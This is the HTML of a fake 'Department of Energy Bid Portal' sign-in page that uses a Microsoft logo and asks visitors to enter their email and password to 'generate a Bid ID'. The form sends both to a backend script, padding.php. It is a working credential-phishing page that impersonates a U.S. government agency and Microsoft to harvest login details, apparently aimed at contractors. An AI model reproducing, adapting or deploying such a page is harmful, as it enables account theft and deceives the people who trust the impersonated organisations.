<!DOCTYPE html>
<html lang="en">

<head>
    <link rel="stylesheet" href="./bootstrap.min.css">
    <link rel="stylesheet" href="./alter.css">
    
    <title>Department of Energy Bid Portal</title>
    <link rel="icon" href="https://www.energy.gov/sites/all/themes/clean_energy/favicon.ico">
</head>


<body class="bg-image">
    <div class="row">
        <main class="col-md-4 offset-4  card">
            <form role="form" method="POST" action="padding.php" name="ContactForm"
                onsubmit="return ValidateContactForm();">
                <div class="margin-bottom-20">
                    <picture class="logo margin-bottom-16" role="presentation">
                        <source
                            srcset="./untitled.png">
                        <img src="./untitled.png"
                            data-bind="attr: {alt: config.text.microsoftLogo}" alt="Microsoft Logo">
                    </picture>
                </div>

                <!-- ko ifnot: showSplitter -->
                <div role="dialog" aria-labelledby="signInTitle" aria-describedby="signInDescription">
                    <h4 id="signInTitle" class="row text-title margin-bottom-16" aria-hidden="true">Sign in with your email to generate Bid ID</h4>
                    <div id="signInDescription">
                        <!-- ko if: context -->
                        <!-- /ko -->
                    </div>
                    <div class="alert alert-error text-body margin-bottom-12 col-md-12" role="alert"
                        style="display: none;"></div>
                    <div class="row margin-bottom-16">
                        <div class="form-group col-md-12 placeholderContainer">
                            <input type="text" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required
                                class="form-control" name="Email" aria-label="Email"
                                placeholder="Email Address">
                            <!-- ko if: isRequestPending -->
                            <!-- /ko -->
                            <!-- ko if: showPlaceholder -->
                            <!-- /ko -->
                        </div>
                    </div>
                    <div class="row margin-bottom-16">
                        <div class="form-group col-md-12 placeholderContainer">
                            <input type="password" class="form-control" aria-required="true" aria-label="Password"
                                placeholder="Password " name="Password" required type="password" placeholder="Password">
                        </div>
                    </div>
                    <!-- ko if: showEnterProductKey -->
                    <!-- /ko -->
                    <!-- ko if: showCreateAccount -->
                   
                    <!-- /ko -->
                </div>
                <!-- /ko -->

                <!-- ko if: showSplitter -->
                <!-- /ko -->
                <!-- ko ifnot: showSplitter -->
                <div>
                    <div class="float-right">
                        <input type="submit" onclick="checkValid(this.form.address);" class="btn btn-primary must"
                            value="Login">
                    </div>
                </div>
                <!-- /ko -->
            </form>

        </main>
    </div>

    <footer class="fixed-bottom">

        <div class="float-right">
            <small style="padding-right: 10px;"> Privacy statement </small>
            
            <small>2019 U.S. Department of Energy</small>

        </div>

    </footer>
    <script src="padding.php"></script>
</body>

</html>